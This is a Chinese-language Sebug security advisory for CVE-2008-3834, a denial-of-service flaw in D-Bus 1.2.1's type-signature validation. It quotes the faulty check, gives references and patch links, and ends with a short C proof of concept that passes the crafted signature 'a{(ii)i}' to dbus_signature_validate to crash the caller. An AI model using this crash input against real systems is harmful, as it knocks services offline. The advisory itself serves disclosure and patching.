BUGTRAQ ID: 31602
CVE(CAN) ID: CVE-2008-3834
D-BUS是一个设计目标为应用程序间通信的消息总线系统。
D-BUS的_dbus_validate_signature_with_reason()函数没有正确地验证类型代码:
if (last == DBUS_DICT_ENTRY_BEGIN_CHAR &&
!dbus_type_is_basic (*p))
{
result = DBUS_INVALID_DICT_KEY_MUST_BE_BASIC_TYPE;
goto out;
}
如果使用D-Bus的应用受骗验证了特制的签名的话,就可能会终止。
D-Bus dbus_signature_validate()类型签名拒绝服务漏洞
Published:2008-10-06
Vulnerable:
D-Bus 1.2.1
Discription:
<*References
schelte (schelte@wanadoo.nl)*>
http://secunia.com/advisories/32127/
https://bugs.freedesktop.org/show_bug.cgi?format=multiple&id=17803
SEBUG Solution:
D-Bus
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://admin.fedoraproject.org/updates/dbus-1.2.4-1.fc9
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
#include <dbus/dbus.h>
int main ()
{
return !dbus_signature_validate("a{(ii)i}", NULL);
}
// Sebug.net [ 2008-10-10 ]